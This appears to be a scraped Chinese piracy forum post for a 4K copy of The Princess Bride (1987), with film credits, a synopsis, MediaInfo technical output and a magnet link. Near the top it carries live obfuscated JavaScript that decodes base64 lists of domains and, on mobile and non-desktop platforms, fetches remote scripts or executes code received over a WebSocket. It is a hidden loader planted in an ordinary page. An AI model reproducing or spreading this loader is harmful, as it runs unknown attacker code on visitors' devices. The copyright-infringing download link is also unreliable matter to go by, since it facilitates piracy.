公主新娘[简繁字幕].The.Princess.Bride.1987.UHD.BluRay.2160p.4K迅雷下载 21.18GB

版主小s 18天前 268

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 公主新娘

◎片 名 The Princess Bride

◎年 代 1987

◎产 地 美国

◎类 别 爱情 / 家庭 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 1987-09-18(多伦多电影节) / 1987-10-09(美国)

◎IMDb链接 https://www.imdb.com/title/tt0093779/

◎豆瓣评分 7.0/10 (9938人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297280/

◎片 长 98 分钟

◎导 演 罗伯·莱纳 Rob Reiner (id:1031903)

◎编 剧 威廉姆·高德曼 William Goldman (id:1022867)

◎演 员 加利·艾尔维斯 Cary Elwes (id:1040521)

罗宾·怀特 Robin Wright (id:1002676)

曼迪·帕廷金 Mandy Patinkin (id:1036380)

比利·克里斯托 Billy Crystal (id:1031893)

华莱士·肖恩 Wallace Shawn (id:1040504)

克里斯·萨兰登 Chris Sarandon (id:1025203)

Derek Pykett Derek Pykett (id:1246495)

马尔科姆·斯托里 Malcolm Storry (id:1149087)

玛格里·梅森 Margery Mason (id:1125641)

弗莱德·萨维奇 Fred Savage (id:1010559)

卡罗尔·凯恩 Carol Kane (id:1019072)

梅尔·史密斯 Mel Smith (id:1036735)

彼得·法尔克 Peter Falk (id:1049632)

巨人安德烈 André the Giant (id:1054818)

克里斯托弗·格斯特 Christopher Guest (id:1055064)

彼得·库克 Peter Cook (id:1070241)

贝齐·布兰特利 Betsy Brantley (id:1074472)

Willoughby Gray Willoughby Gray (id:1091269)

安妮·戴森 Anne Dyson (id:1383451)

安德鲁·沙因曼 Andrew Scheinman (id:1276019)

诺曼·利尔 Norman Lear (id:1025371)

罗伯·莱纳 Rob Reiner (id:1031903)

马克·诺普弗勒 Mark Knopfler (id:1023050)

艾德里安·比德尔 Adrian Biddle (id:1009791)

罗伯特·利顿 Robert Leighton (id:1289761)

珍妮特·希尔森 Janet Hirshenson (id:1286699)

简·詹金斯 Jane Jenkins (id:1103031)

Keith Pain Keith Pain (id:1293817)

玛姬·格雷 Maggie Gray (id:1285352)

诺尔曼·加尔伍德 Norman Garwood (id:1284595)

菲利斯·达尔顿 Phyllis Dalton (id:1281746)

恩雅·芬奈尔 Eithne Fennel (id:1283567)

彼得·蒙塔格纳 Peter Montagna (id:1125068)

彼得·罗勃-金 Peter Robb-King (id:1295741)

洛伊斯·布尔维尔 Lois Burwell (id:1276653)

Nigel Stone Nigel Stone (id:1298505)

肯特·休斯顿 Kent Houston (id:1286980)

保罗·威尔逊 Paul Wilson (id:1301059)

◎标 签 美国 / 爱情 / 童话 / 喜剧 / 1987 / 美国电影 / 魔幻 / 奇幻

◎简 介

故事从慈祥的爷爷给生病的孙子讲故事说起,爷爷带来一本厚厚的童话故事书《公主新娘》。这个世代相传的童话故事讲述了一段爱与冒险的真爱故事。善良美丽的少女布卡特(罗宾·怀特 Robin Wright 饰)住在宁静的小村庄弗洛林,她与少年维斯特雷(加利·艾尔维斯 Cary Elwes 饰)青梅竹马两小无猜,两人很快陷入热恋。然而贫穷的维斯特雷希望给布卡特更好的生活,于是扬帆远航离开了村庄。但是维斯特雷的船并没有到达目的地,传言说他死在了海盗的手里。五年后,伤心欲绝的布卡特成为了王子胡姆普丁克(克里斯·萨兰登 Chris Sarandon饰)的未婚妻,可她并不爱他,她的心里仍苦苦思念着真爱维斯特雷。一次意外让布卡特再次遇见了维斯特雷,然而邪恶的王子却绑架了布卡特,并逼迫她嫁给自己。此时的维斯特雷已是一位勇敢强壮的海盗,为救真爱,他与武艺超群的剑客埃尼戈·蒙托亚...

◎获奖情况 (共1项)

第60届奥斯卡金像奖 (1988)

最佳原创歌曲(提名)

└──威利·德威尔 (id:1083729)

  1. General

  2. Unique ID : 72532787659648359791798761069650771153 (0x36914E8880969DEB1BFB253EE14DFCD1)

  3. Complete name : The.Princess[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 21.2 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 30.8 Mb/s

  10. Encoded date : UTC 2021-07-13 09:51:09

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 38 min

  21. Bit rate : 28.8 Mb/s

  22. Width : 3 840 pixels

  23. Height : 2 076 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0 (Type 2)

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.151

  31. Stream size : 19.8 GiB (94%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 28846 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x2076 / interlace=0 / total-frames=141617 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,10) / cll=1000,400 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0010 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 1000 cd/m2

  45. Maximum Frame-Average Light Level : 400 cd/m2


  46. Audio

  47. ID : 2

  48. Format : DTS XLL

  49. Format/Info : Digital Theater Systems

  50. Commercial name : DTS-HD Master Audio

  51. Codec ID : A_DTS

  52. Duration : 1 h 38 min

  53. Bit rate mode : Variable

  54. Bit rate : 1 733 kb/s

  55. Channel(s) : 6 channels

  56. Channel layout : C L R Ls Rs LFE

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 93.750 FPS (512 SPF)

  59. Bit depth : 16 bits

  60. Compression mode : Lossless

  61. Stream size : 1.19 GiB (6%)

  62. Title : English DTS-HD Master Audio 5.1 @ 1733 kbps

  63. Language : English

  64. Default : Yes

  65. Forced : No


  66. Text #1

  67. ID : 3

  68. Format : PGS

  69. Codec ID : S_HDMV/PGS

  70. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  71. Duration : 1 h 32 min

  72. Bit rate : 46.3 kb/s

  73. Count of elements : 2318

  74. Stream size : 30.6 MiB (0%)

  75. Title : Eng/SUP

  76. Language : English

  77. Default : No

  78. Forced : No


  79. Text #2

  80. ID : 4

  81. Format : PGS

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 34 min

  85. Bit rate : 31.8 kb/s

  86. Count of elements : 2675

  87. Stream size : 21.5 MiB (0%)

  88. Title : Chs/SUP 简体

  89. Language : Chinese

  90. Default : Yes

  91. Forced : No


  92. Text #3

  93. ID : 5

  94. Format : PGS

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 34 min

  98. Bit rate : 32.5 kb/s

  99. Count of elements : 2675

  100. Stream size : 22.0 MiB (0%)

  101. Title : Cht/SUP 繁体

  102. Language : Chinese

  103. Default : No

  104. Forced : No


  105. Text #4

  106. ID : 6

  107. Format : PGS

  108. Codec ID : S_HDMV/PGS

  109. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  110. Duration : 1 h 34 min

  111. Bit rate : 56.9 kb/s

  112. Count of elements : 2675

  113. Stream size : 38.5 MiB (0%)

  114. Title : Chs/SUP 简英双语

  115. Language : Chinese

  116. Default : No

  117. Forced : No


  118. Text #5

  119. ID : 7

  120. Format : PGS

  121. Codec ID : S_HDMV/PGS

  122. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration : 1 h 34 min

  124. Bit rate : 57.6 kb/s

  125. Count of elements : 2675

  126. Stream size : 38.9 MiB (0%)

  127. Title : Cht/SUP 繁英双语

  128. Language : Chinese

  129. Default : No

  130. Forced : No


  131. Menu

  132. 00:00:00.000 : en:第 01 章

  133. 00:02:28.148 : en:第 02 章

  134. 00:05:46.346 : en:第 03 章

  135. 00:10:05.605 : en:第 04 章

  136. 00:13:30.143 : en:第 05 章

  137. 00:17:32.385 : en:第 06 章

  138. 00:21:57.650 : en:第 07 章

  139. 00:25:14.847 : en:第 08 章

  140. 00:29:34.106 : en:第 09 章

  141. 00:34:43.748 : en:第 10 章

  142. 00:40:23.087 : en:第 11 章

  143. 00:44:26.497 : en:第 12 章

  144. 00:48:13.724 : en:第 13 章

  145. 00:53:22.950 : en:第 14 章

  146. 00:57:30.197 : en:第 15 章

  147. 01:00:37.384 : en:第 16 章

  148. 01:03:49.576 : en:第 17 章

  149. 01:07:04.771 : en:第 18 章

  150. 01:10:11.958 : en:第 19 章

  151. 01:14:37.723 : en:第 20 章

  152. 01:18:16.942 : en:第 21 章

  153. 01:21:57.162 : en:第 22 章

  154. 01:24:40.325 : en:第 23 章

  155. 01:30:20.415 : en:第 24 章

  156. 01:33:41.616 : en:第 25 章


TAGS 奇幻 冒险 爱情 家庭

磁力链:
  • magnet:?xt=urn:btih:8FF5F290295C0640ACEB5C834610802F6CCD44B1
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回